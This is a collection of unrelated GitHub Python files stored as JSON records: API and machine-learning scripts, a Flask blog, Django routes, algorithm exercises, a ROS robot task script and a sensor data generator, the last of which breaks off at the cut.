+{"seq_id":"31738203632","text":"import requests\n\nURL = \"https://rapidapi.p.rapidapi.com/api/search/CustomImageSearchAPIV2\"\nHEADERS = {\n 'x-rapidapi-host': \"custom-search.p.rapidapi.com\",\n 'x-rapidapi-key': \"Your-X-RapidAPI-Key\"\n}\n\nquery = \"taylor swift\"\npage_number = 1\nsearch_engine_id = \"Your-Search-Engine-Id\"\n\nquery_string = {\"q\": query,\n \"pageNumber\": page_number,\n \"searchEngineId\": search_engine_id}\n\nresponse = requests.get(URL, headers=HEADERS, params=query_string).json()\n\nprint(response)\n\ntotalCount = response[\"totalCount\"]\n\nfor image in response[\"value\"]:\n url = image[\"url\"]\n name = image[\"name\"]\n title = image[\"title\"]\n\n provider = image[\"provider\"][\"name\"]\n\n image_url = image[\"url\"]\n image_height = image[\"height\"]\n imageWidth = image[\"width\"]\n\n thumbnail = image[\"thumbnail\"]\n thumbnail_height = image[\"thumbnailHeight\"]\n thumbnail_width = image[\"thumbnailWidth\"]\n\n print(\"Url: %s. Title: %s.\" % (url, name))\n","repo_name":"roikra/usearch-customsearch-api","sub_path":"ImageSearchAPITest.py","file_name":"ImageSearchAPITest.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"6453118141","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 20:03:11 2018\n\n@author: Ugur\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.preprocessing import Imputer, LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.cross_validation import train_test_split\n\nveriler = pd.read_csv(\"2.3.1_eksikveriler.csv\")\nprint(veriler)\n\nnumerik_veri = veriler.iloc[:,1:4].values\nprint(numerik_veri)\n\n# handling missing values\nimputer = Imputer(missing_values=\"NaN\", strategy=\"mean\", axis=0)\nnumerik_veri = imputer.fit_transform(numerik_veri)\nprint(numerik_veri)\n\n# categorical -> numeric\nulke = veriler.iloc[:,0:1].values\nprint(ulke)\n\nle = LabelEncoder()\nulke[:,0] = le.fit_transform(ulke[:,0])\nprint(ulke)\n\nohe = OneHotEncoder()\nulke = ohe.fit_transform(ulke).toarray()\nprint(ulke)\n\n# numpy to dataframe\nsonuc = pd.DataFrame(data = ulke, columns = [\"fr\", \"tr\", \"us\"])\nprint(sonuc)\n\nsonuc2 = pd.DataFrame(data = numerik_veri, columns = [\"boy\", \"kilo\", \"yas\"])\nprint(sonuc2)\n\ncinsiyet = veriler.iloc[:,-1].values\nprint(cinsiyet)\n\nsonuc3 = pd.DataFrame(data = cinsiyet, columns=['cinsiyet'])\nprint(sonuc3)\n\n# merging dataframes\ns = pd.concat([sonuc, sonuc2], axis=1)\nprint(s)\n\ns2 = pd.concat([s, sonuc3], axis=1)\nprint(s2)\n\n# splitting the data into training and test sets\nx_train, x_test, y_train, y_test = train_test_split(s, sonuc3, test_size = 0.33, random_state = 0)\n\n# scaling the data\nsc = StandardScaler()\nX_train = sc.fit_transform(x_train)\nX_test = 
sc.transform(x_test)  # scale the test set with the scaler fitted on the training data","repo_name":"inantubek/Udemy","sub_path":"makine-ogrenmesi/2_veriler.py","file_name":"2_veriler.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14228237648","text":"from tf_donkey import Model\nimport os\nfrom utils import *\nfrom generator import DataGenerator, preprocess_normalize_images_bin_annos\nfrom generator import batch_data_aug as data_aug_fn\nimport json\n\ndef update_config(save_dir, payload):\n path = save_dir+\"/config.json\"\n if os.path.exists(path):\n with open(path, 'r') as f: existing_config=json.load(f)\n payload.update(existing_config)\n\n with open(path, 'w') as f:\n json.dump(payload, f)\n\ndef main():\n import argparse as argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--train-txt', type=str, required=True)\n parser.add_argument('--test-txt', type=str, required=True)\n parser.add_argument('--save-dir', type=str, required=True)\n parser.add_argument('--num-bins', type=int, required=True)\n parser.add_argument('--lr', type=float, required=False, default = 0.001)\n parser.add_argument('--batch-size', type=int, required=False, default=50)\n parser.add_argument('--epochs', type=int, required=False, default=10)\n parser.add_argument('--data-dir', type=str, required=True)\n parser.add_argument('--shape', type=int, required=True, nargs=3, help=\"height width channels\")\n parser.add_argument('--message', type=str, required=True)\n\n args = parser.parse_args()\n data_dir = args.data_dir\n image_dir = os.path.join(data_dir, \"images/\")\n anno_dir = os.path.join(data_dir, \"annotations/\")\n train_path = args.train_txt\n test_path = args.test_txt\n\n # Load list of image names for train and test\n raw_train = load_dataset(train_path)\n raw_test = load_dataset(test_path)\n\n # Create train and test generators\n num_bins = args.num_bins\n batch_size = args.batch_size\n train_gen = DataGenerator(batch_size=batch_size,\n dataset=raw_train[:200],\n image_dir=image_dir,\n anno_dir=anno_dir,\n preprocess_fn=preprocess_normalize_images_bin_annos,\n data_aug_fn=data_aug_fn,\n random_mirror=True)\n test_gen = DataGenerator(batch_size=batch_size,\n dataset=raw_test[:50],\n image_dir=image_dir,\n anno_dir=anno_dir,\n shuffle=True,\n preprocess_fn=preprocess_normalize_images_bin_annos,\n data_aug_fn=data_aug_fn,\n random_mirror=True)\n # Kick-off\n save_dir = args.save_dir\n epochs = args.epochs\n in_shape = args.shape\n lr = args.lr\n classes = [i for i in range(num_bins)]\n message = args.message\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n update_config(save_dir,\n {\"data_dir\" : data_dir,\n \"num_bins\" : num_bins,\n \"lr\" : lr,\n \"batch_size\" : batch_size,\n \"epochs\" : epochs,\n \"input_shape\" : in_shape,\n \"message\" : message})\n car_brain = Model(in_shape, classes=classes)\n car_brain.train(train_gen, test_gen, save_dir, epochs=epochs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tall-josh/my_donkey_car","sub_path":"training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"72274068392","text":"from flask import Flask, request, redirect, render_template\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 
'mysql+pymysql://build-a-blog:blog@localhost:8889/build-a-blog'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'lostgirl'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(1000))\n \n\n def __init__(self, title, body):\n self.title = title\n self.body = body\n\n@app.route('/', methods=['POST', 'GET'])\ndef redirect_to_blog():\n return redirect('/blog')\n\n\n@app.route('/addnewpost', methods=['POST', 'GET'])\ndef addnewpost():\n\n if request.method == 'POST':\n title_name = request.form['titlename']\n post_name = request.form['contribution']\n new_blog = Blog(title_name, post_name)\n title_error = ''\n contribution_error = ''\n if title_name == '':\n title_error = \"Please name your Blog\"\n\n if post_name == '':\n contribution_error = \"Please make a blog\"\n\n # re-render the form if either field is empty, so an empty title is rejected too\n if title_error or contribution_error:\n return render_template('addnewpost.html', title_error=title_error, contribution_error=contribution_error)\n else: \n db.session.add(new_blog)\n db.session.commit()\n return redirect('/blog?id={0}'.format(new_blog.id))\n\n return render_template('addnewpost.html')\n\n\n@app.route('/blog', methods=['GET'])\ndef blog():\n\n blogpost = request.args.get('id')\n if blogpost is not None:\n blogs = Blog.query.filter_by(id=blogpost)\n return render_template('blog-list.html', blogs=blogs)\n\n else:\n blogs = Blog.query.all()\n\n return render_template('blog.html', blogs=blogs)\n\nif __name__ == '__main__':\n app.run()","repo_name":"MaggieDunham/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"42036085836","text":"from django.conf.urls import url\r\nfrom . 
import views\r\n\r\napp_name = 'music'\r\n\r\nurlpatterns = [\r\n\r\n\t# /music\r\n\turl(r'^(?P<album_id>[0-9]+)/(?P<song_id>[0-9]+)$', views.index, name='index'),\r\n\r\n\t# /music/13\r\n\turl(r'^(?P<album_id>[0-9]+)/$', views.details, name='details'),\r\n\r\n\t# /music/<song_id>/favorite/\r\n\turl(r'^(?P<song_id>[0-9]+)/favorite/$', views.favorite, name='favorite'),\r\n\r\n url(r'^back_details/(?P<album_id>[0-9]+)$', views.back_details, name='back_details'),\r\n]","repo_name":"rajarshikhare/Music-player-Django","sub_path":"music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74118702313","text":"from typing import List\n\n\nclass Solution:\n def __init__(self):\n self.rows = 0\n self.cols = 0\n self.dp = []\n\n def calculateMinimumHP(self, dungeon: List[List[int]]) -> int:\n self.rows, self.cols = len(dungeon), len(dungeon[0])\n self.dp = [[float('inf')] * self.cols for _ in range(self.rows)]\n\n for row in reversed(range(self.rows)):\n for col in reversed(range(self.cols)):\n cur_cell = dungeon[row][col]\n right_health = self.get_min_health(cur_cell, row, col + 1)\n down_health = self.get_min_health(cur_cell, row + 1, col)\n next_health = min(right_health, down_health)\n if next_health != float('inf'):\n min_health = next_health\n else:\n min_health = 1 if cur_cell >= 0 else 1 - cur_cell\n self.dp[row][col] = min_health\n\n return int(self.dp[0][0])\n\n def get_min_health(self, cur_cell, next_row, next_col):\n if next_row >= self.rows or next_col >= self.cols:\n return float('inf')\n next_cell = self.dp[next_row][next_col]\n return max(1, next_cell - cur_cell)\n","repo_name":"cabulous/leetcode","sub_path":"python/174.py","file_name":"174.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"22211251206","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.measure import label\nfrom collections import Counter\nfrom skimage.filters import threshold_otsu, threshold_li, threshold_local\nfrom skimage.util import view_as_windows\n\n\n# chain algo\n\n# from the top clockwise\ndef neighbours4(y, x):\n\treturn (y-1, x), (y, x+1), (y+1, x), (y, x-1)\n\n\n# from the top clockwise\ndef neighbours8(y, x):\n\treturn ((y-1, x), (y-1, x+1), (y, x+1), (y+1, x+1), (y+1, x), (y+1, x-1),\n\t\t\t(y, x-1), (y-1, x-1))\n\n\ndef get_bounds(labelled, label=1, connectivity=neighbours8):\n\tpos = np.where(labelled == label)\n\tbounds = []\n\tfor y, x in zip(*pos):\n\t\tfor yn, xn in connectivity(y, x):\n\t\t\t# if on edge of the whole image\n\t\t\tif yn < 0 or yn > labelled.shape[0] - 1:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\t\t\telif xn < 0 or xn > labelled.shape[1] - 1:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\t\t\telif labelled[yn, xn] == 0:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\treturn bounds\n\n\ndef chain_algo(labelled, label=1, connectivity=neighbours8):\n\tresult = []\n\t# vector = {(y, x): value} (we get the directions counterclockwise from the right)\n\tvectors = {(0, 1): 0, (-1, 1): 1, (-1, 0): 2, (-1, -1): 3, (0, -1): 4, (1, -1): 5, (1, 0): 6, (1, 1): 7}\n\tbounds = np.array(get_bounds(labelled, label, connectivity))\n\t# print(bounds)\n\t\n\ty_bound = bounds[:, 0]\n\tx_bound = bounds[:, 1]\n\t# print(len(bounds))\n\t\n\t# get the first point \n\ty = bounds[0][0]\n\tx = bounds[0][1]\n\tprint(f\"The first point: {(y, x)}\")\n\n\tcurrent_direction = None\n\tprevious_direction = 
None\n\n\tfor i in range(len(bounds)):\n\n\t\tprint(f\"Current (y, x): {(y, x)}\")\n\n\t\tnbs = connectivity(y, x)\n\t\tfor nb in nbs:\n\t\t\tif labelled[nb[0], nb[1]] == 1:\n\t\t\t\ty_ = nb[0] - y\n\t\t\t\tx_ = nb[1] - x\n\t\t\t\tresult.append(vectors[y_, x_])\n\t\t\t\tx += x_\n\t\t\t\ty += y_\n\t\t\t\tbreak\n\n\n\t# # starting point\n\t# x = x_bound[0]\n\t# y = y_bound[0]\n\t# current_direction = None\n\n\t# # accidentally I made it go counterclockwise\n\t# for i in range(1, len(x_bound)):\n\t# \tprint(\"\\n\", i)\n\t# \tprint(\"x\", x, \"y\", y)\n\t# \tprint(\"direction\", current_direction)\n\n\t# \tprevious_direction = current_direction\n\t# \tcount = 0\n\t# \tnbs = connectivity(y, x)\n\t# \tprint(nbs)\n\t# \tprint(nbs[-1::-1])\n\t# \tprint()\n\t# \tfor yn, xn in nbs[::-1]:\n\t# \t\tcount += 1\n\t# \t\tif labelled[yn, xn] == 1:\n\t# \t\t\tprint(\"x\", x, \"xn\", xn)\n\t# \t\t\tprint(\"y\", y, \"yn\", yn)\n\t# \t\t\tprint(labelled[yn, xn])\n\t# \t\t\tprint()\n\t# \t\t\tx_ = xn - x\n\t# \t\t\ty_ = yn - y\n\t# \t\t\tcurrent_direction = vectors[(y_, x_)]\n\t# \t\t\tif previous_direction != current_direction:\n\t# \t\t\t\tcontinue\n\t# \t\t\tres.append(current_direction)\n\t# \t\t\tx = xn\n\t# \t\t\ty = yn\n\t# \t\t\tbreak\n\t# \tprint(\"Iterations:\", count)\n\treturn result\n\n\n# image = np.load(\"similar.npy\")\n\nimage = np.loadtxt(\"ex.dat\")\n\nlabelled = label(image)\n# print(labelled[90:110, 195:210])\nlabels = np.unique(labelled)[1:]\n# print(labels)\n\nbd = np.array(get_bounds(labelled, label=1))\n# print(bd)\nx_bound = bd[:, 1]\ny_bound = bd[:, 0]\n\n\n# print(chain_algo(labelled))\n\n\nplt.imshow(labelled)\nplt.scatter(x_bound, y_bound)\nplt.show()\n\n","repo_name":"MS-17/computer_vision","sub_path":"chain_algo_task7/chain_algo.py","file_name":"chain_algo.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16011140235","text":"# uncompyle6 version 3.2.3\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 2.7.5 (default, Jul 13 2018, 13:06:57) \n# [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)]\n# Embedded file name: ./monitor/migrations/0010_auto_20171207_1554.py\n# Compiled at: 2018-08-23 19:33:14\n# Size of source mod 2**32: 1783 bytes\nfrom __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('monitor', '0009_auto_20171120_0656')]\n operations = [\n migrations.CreateModel(name='SQLMON',\n fields=[\n (\n 'id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n (\n 'created_at', models.DateTimeField()),\n (\n 'status', models.CharField(max_length=100, null=True)),\n (\n 'sql_id', models.CharField(max_length=100, null=True)),\n (\n 'elapsed_time', models.BigIntegerField(null=True)),\n (\n 'db_time', models.BigIntegerField(null=True)),\n (\n 'db_cpu', models.BigIntegerField(null=True)),\n (\n 'sql_exec_id', models.BigIntegerField(null=True)),\n (\n 'sql_exec_start', models.CharField(max_length=100, null=True)),\n (\n 'sql_plan_hash_value', models.BigIntegerField(null=True)),\n (\n 'inst_id', models.IntegerField(null=True)),\n (\n 'username', models.CharField(max_length=100, null=True)),\n (\n 'sql_text', models.TextField(max_length=100000, null=True)),\n (\n 'sqlmon', models.TextField(max_length=100000, null=True)),\n (\n 'database', models.ForeignKey(blank=True, null=True, 
on_delete=django.db.models.deletion.CASCADE, to='monitor.Database'))]),\n migrations.AlterIndexTogether(name='sqlmon',\n index_together=set([('database', 'sql_id', 'sql_exec_id'), ('database', 'created_at')]))]\n# okay decompiling ./restful/hawkeye/monitor/migrations/0010_auto_20171207_1554.pyc\n","repo_name":"zsprn123/yunqu","sub_path":"restful/hawkeye/monitor/migrations/0010_auto_20171207_1554.py","file_name":"0010_auto_20171207_1554.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"33350546499","text":"import math\n\n\n# Formulas specified here can be found in the following document:\n# https://www.mesonet.org/images/site/ASCE_Evapotranspiration_Formula.pdf\n# Page number of each formula is supplied with each function.\n\ndef get_delta(temp):\n \"\"\"\n Reference page number: 28-29\n Parameters\n ------------------------------\n temp: (``float``)\n The air temperature in degrees Celsius\n Returns\n ------------------------------\n delta: (``float``)\n The slope of the saturation vapor pressure-temperature curve in kPa/C\n \"\"\"\n numerator = 2503 * math.exp((17.27 * temp) / (temp + 237.3))\n denominator = math.pow(temp + 237.3, 2)\n delta = numerator / denominator\n return delta\n\n\ndef get_flux_density(r_n_metric, r_n, os):\n \"\"\"\n Reference page number: 44\n Currently, nighttime is defined as solar radiation values less than or equal to 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n r_n: (``float``)\n Solar radiation in MJ/hm2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n G: (``float``)\n Soil heat flux density MJ/m^2 h\n \"\"\"\n G = None\n daytime = r_n_metric > 5\n\n if os:\n if daytime:\n G = 0.1 * r_n\n else:\n G = 0.5 * r_n\n else:\n if daytime:\n G = 0.04 * r_n\n else:\n G = 0.2 * r_n\n return G\n\n\ndef get_gamma(p):\n \"\"\"\n Reference page number: 28\n Parameters\n ------------------------------\n p: (``float``)\n Barometric pressure in kPa\n Returns\n ------------------------------\n gamma: (``float``)\n Gamma (psychrometric constant) in kPa/C\n \"\"\"\n gamma = 0.000665 * p\n return gamma\n\n\ndef get_cn(r_n_metric, os):\n \"\"\"\n Reference page number: 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n cn: (``int``)\n Numerator constant\n \"\"\"\n cn = None\n # daytime is a boolean, so test it directly instead of comparing it to 5\n daytime = r_n_metric > 5\n if os:\n if daytime:\n cn = 37\n return cn\n else:\n cn = 37\n return cn\n else:\n if daytime:\n cn = 66\n return cn\n else:\n cn = 66\n return cn\n\n\ndef get_cd(r_n_metric, os):\n \"\"\"\n Reference page number: 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n cd: (``float``)\n Denominator constant\n \"\"\"\n cd = None\n # daytime is a boolean, so test it directly instead of comparing it to 5\n daytime = r_n_metric > 5\n\n if os:\n if daytime:\n cd = 0.24\n return cd\n else:\n cd = 0.96\n return cd\n else:\n if daytime:\n cd = 0.25\n return cd\n else:\n cd = 1.7\n return cd\n\n\ndef get_es(temp):\n \"\"\"\n Reference page number: 29\n Parameters\n ------------------------------\n temp: 
(``float``)\n Air temperature in degrees Celsius\n Returns\n ------------------------------\n es: (``float``)\n The saturation vapour pressure\n \"\"\"\n es = 0.6108 * math.exp((17.27 * temp) / (temp + 237.3))\n return es\n\n\ndef get_ea(temp, rh):\n \"\"\"\n Reference page number: 31-32\n Parameters\n ------------------------------\n temp: (``float``)\n Air temperature in degrees Celsius\n rh: (``float``)\n Relative humidity\n Returns\n ------------------------------\n ea: (``float``)\n The actual vapour pressure\n \"\"\"\n es = get_es(temp)\n ea = (rh / 100) * es\n return ea\n\n\ndef solar_rad_metric_to_campbell(rad):\n \"\"\"\n Parameters\n ------------------------------\n rad: (``float``)\n Solar radiation in W/m2\n Returns\n ------------------------------\n campbell_rad: (``float``)\n Solar radiation in MJ/hm2\n \"\"\"\n campbell_rad = rad * (3600 / math.pow(10, 6))\n return campbell_rad\n\n\ndef solar_rad_campbell_to_metric(rad):\n \"\"\"\n Parameters\n ------------------------------\n rad: (``float``)\n Solar radiation in MJ/hm2\n Returns\n ------------------------------\n metric_rad: (``float``)\n Solar radiation in W/m2\n \"\"\"\n metric_rad = rad * (math.pow(10, 6) / 3600)\n return metric_rad\n","repo_name":"RTGS-Lab/pygemsiot","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"37755819709","text":"'''\n剑指 Offer, Problem 27: Mirror of a Binary Tree\nleetcode 226. Invert Binary Tree\n'''\n\ndef invert_tree(root):\n '''\n Convert a binary tree into its mirror image\n '''\n # Solution 1: recursion\n # if not root:\n # return None\n # root.left, root.right = invert_tree(root.right), invert_tree(root.left)\n # return root\n\n # Solution 2: iterative (non-recursive)\n # if not root:\n # return None\n # stack = [root]\n # while stack:\n # cur = stack.pop()\n # if cur:\n # cur.left, cur.right = cur.right, cur.left\n # if cur.left:\n # stack.append(cur.left)\n # if cur.right:\n # stack.append(cur.right)\n # return root\n\n # Solution 2, condensed:\n stack = [root]\n while stack:\n cur = stack.pop()\n if cur:\n cur.left, cur.right = cur.right, cur.left\n stack.append(cur.left)\n stack.append(cur.right)\n return root","repo_name":"wuyaqiang/Algorithm_Learn","sub_path":"剑指Offer/MyCode/No_27.py","file_name":"No_27.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20689310982","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport rospy\nimport time\nfrom PyKDL import Frame, Vector, Rotation\nimport PyKDL\nimport tf\nfrom superros.comm import RosNode\nfrom superros.logger import Logger\nfrom rocup.param.global_parameters import Parameters\nfrom rocup.taskmanager.task_manager_state_machine import TaskManagerSM\nimport superros.transformations as transformations\nimport json\n\n\ndef getControlInputs(node, ctrl_id):\n if ctrl_id == \"wire_insertion\":\n hole_tf = None\n while not hole_tf:\n try:\n hole_tf = node.retrieveTransform(frame_id=\"tf_storage_hole\",\n parent_frame_id=\"comau_smart_six/base_link\",\n time=-1)\n hole_tf = transformations.KDLtoTf(hole_tf)\n except Exception as e:\n print(\"Waiting for 'tf_storage_hole'...\")\n\n print(\"'tf_storage_hole' FOUND!!!\")\n return {\"hole_tf\": hole_tf, \"wire_angle\": 0}\n else:\n return None\n\n\nif __name__ == '__main__':\n\n #⬢⬢⬢⬢⬢➤ NODE\n node = RosNode(\"wires_task\")\n node.setupParameter(\"hz\", 50)\n node.setHz(node.getParameter(\"hz\"))\n\n task_name = \"wires_task_comau\"\n\n# 
▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ Parameters ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n\n #⬢⬢⬢⬢⬢➤ Robots\n comau_name = Parameters.get(\"COMAU_NAME\")\n gripper_name = Parameters.get(\"SCHUNK_NAME\")\n robot_list = [comau_name, gripper_name]\n\n #⬢⬢⬢⬢⬢➤ Sensors\n tactile_name = \"tactile\"\n sensor_list = [tactile_name]\n\n #⬢⬢⬢⬢⬢➤ Subtasks\n insertion_task_name = \"insertion_task\"\n tool_correction_task_name = \"tool_correction_task\"\n wire_tf_filter_task_name = \"tf_filter\"\n subtask_list = [insertion_task_name, tool_correction_task_name, wire_tf_filter_task_name]\n\n #⬢⬢⬢⬢⬢➤ Controllers\n insertion_control_params = {\n \"step_size\": 0.0001,\n \"force_p_gain\": 1000.0,\n \"force_threshold\": 0.3,\n \"threshold\": [0.15, 2, 2]\n }\n\n insertion_control_inputs = getControlInputs(node, \"wire_insertion\")\n\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ INSTRUCTION LIST ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n\n instruction_list = [\n\n # --------------------------------\n # ----- initial configuration ----\n # --------------------------------\n\n comau_name + \" gototf tf_storage_normal gripper\",\n gripper_name + \" gotoshape shape_open_max\",\n tactile_name + \" reset\",\n\n # # --------------------------------\n # # ---------- wire grasp ----------\n # # --------------------------------\n\n # # fixed and known (wire position)\n # comau_name + \" gototf tf_grasp_approach_1 gripper\",\n # comau_name + \" gototf tf_storage_grasp gripper\",\n # gripper_name + \" gotoshape shape_close\",\n # comau_name + \" gototf tf_grasp_approach_1 gripper\",\n\n # detected by vision (wire position)\n comau_name + \" gototf tf_storage_wire_detection camera\",\n \"system sleep 10\",\n wire_tf_filter_task_name + \" clear tf_name:::terminal_tf\",\n wire_tf_filter_task_name + \" start tf_name:::terminal_tf\",\n comau_name + \" gototf tf_wire_2 gripper\",\n comau_name + \" gototf tf_wire_1 gripper\",\n gripper_name + \" gotoshape shape_close\",\n\n # --------------------------------\n # ------- tool correction --------\n # --------------------------------\n\n comau_name + \" gototf tf_storage_camera_front gripper\",\n \"system sleep 15\",\n tool_correction_task_name + \" correct tool_name:::gripper\",\n comau_name + \" gototf tf_storage_camera_front dynamic\",\n\n comau_name + \" gototf tf_hole_approach_1 dynamic\",\n\n # --------------------------------\n # ----------- insertion ----------\n # --------------------------------\n tactile_name + \" reset\",\n comau_name + \" direct active:::\" + json.dumps(True),\n comau_name + \" controllerdisable id:::\" + json.dumps([\"_all_\"]),\n comau_name + \" controllerselect id:::\" + json.dumps([\"wire_insertion\"]),\n comau_name + \" controllerparameters parameters:::\" + json.dumps({\"wire_insertion\": insertion_control_params}),\n \"system sleep 0.1\",\n comau_name + \" controllerstart input_data:::\" + json.dumps({\"wire_insertion\": insertion_control_inputs}),\n \"system sleep 0.1\",\n insertion_task_name + \" waitend condition:::fuzzy_insertion\",\n \"system condition jumpfalse:::___insertion_fail___\",\n comau_name + \" direct active:::\" + json.dumps(False),\n \"system sleep 15\", # <---- avvitatore\n gripper_name + \" gotoshape shape_open\",\n\n \"___insertion_fail___\",\n comau_name + \" gototf tf_hole_approach_1 dynamic\"\n\n ]\n\n ###############################################################################################\n 
###############################################################################################\n ###############################################################################################\n\n tskm = TaskManagerSM(task_name)\n\n tskm.start(robot_list, sensor_list, instruction_list, subtask_list)\n try:\n while node.isActive():\n tskm.stepForward()\n node.tick()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"zanellar/rocup","sub_path":"scripts/nodes/examples/task_manager/example_task_complete_TODO.py","file_name":"example_task_complete_TODO.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40051422670","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 23 15:26:18 2018\r\n\r\n@author: roza.gruter\r\n\"\"\"\r\n\r\nimport random as rd\r\nimport csv\r\nimport time\r\n\r\n\r\ndef get_nb_sensors():\r\n \"\"\"\r\n Ask user how many sensors need to be generated\r\n Output:\r\n nb_sensors -> number of sensors requested by the user\r\n \"\"\"\r\n\r\n print(\"****************************************************************\")\r\n print(\" Enter the number of sensors to be generated.\")\r\n print(\" You can choose between 1 and 6 sensors.\")\r\n nb_sensors = input(\"Nb of sensors: \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n try:\r\n if (int(nb_sensors) > 6) or (int(nb_sensors) <= 0):\r\n raise ValueError\r\n else:\r\n return int(nb_sensors)\r\n except ValueError:\r\n print(\"Incorrect input. Please try again.\")\r\n return get_nb_sensors()\r\n\r\n\r\ndef get_refresh_rate():\r\n \"\"\"\r\n What should be the refresh rate (in seconds)\r\n Output:\r\n --> integer, nb of seconds between refresh\r\n \"\"\"\r\n\r\n refresh_rate = input(\"Enter the refresh rate (in seconds): \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n try:\r\n return int(refresh_rate)\r\n except ValueError:\r\n print(\"Incorrect input. Please try again.\")\r\n return get_refresh_rate()\r\n\r\n\r\ndef get_data_types(nb_sensors):\r\n \"\"\"\r\n What should be the data type for each sensor (1 - integer, 2 - float)\r\n Input\r\n nb_sensors -> how many sensors (int)\r\n Output\r\n data_type_per_sensor -> list of data types for each sensor\r\n \"\"\"\r\n\r\n print(\"Choose data type for each sensor: 1-integer / 2-float\")\r\n print(\"Enter 1 or 2 for each sensor, use space as a separator\")\r\n nb_type = input(\"Data Types: \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n # split string\r\n data_types = nb_type.split(\" \")\r\n allowed_data_types = (1, 2)\r\n data_nbr = len(data_types)\r\n\r\n if (nb_sensors == data_nbr):\r\n try:\r\n for idx in range(data_nbr):\r\n if int(data_types[idx]) in allowed_data_types:\r\n continue\r\n else:\r\n raise ValueError\r\n\r\n # put splitted data into a list\r\n data_type_per_sensor = [int(data_types[i]) for i in range(data_nbr)]\r\n return data_type_per_sensor\r\n except ValueError:\r\n print(\"Invalid input. Please try again.\")\r\n return get_data_types(nb_sensors)\r\n else:\r\n print(\"Invalid input. 
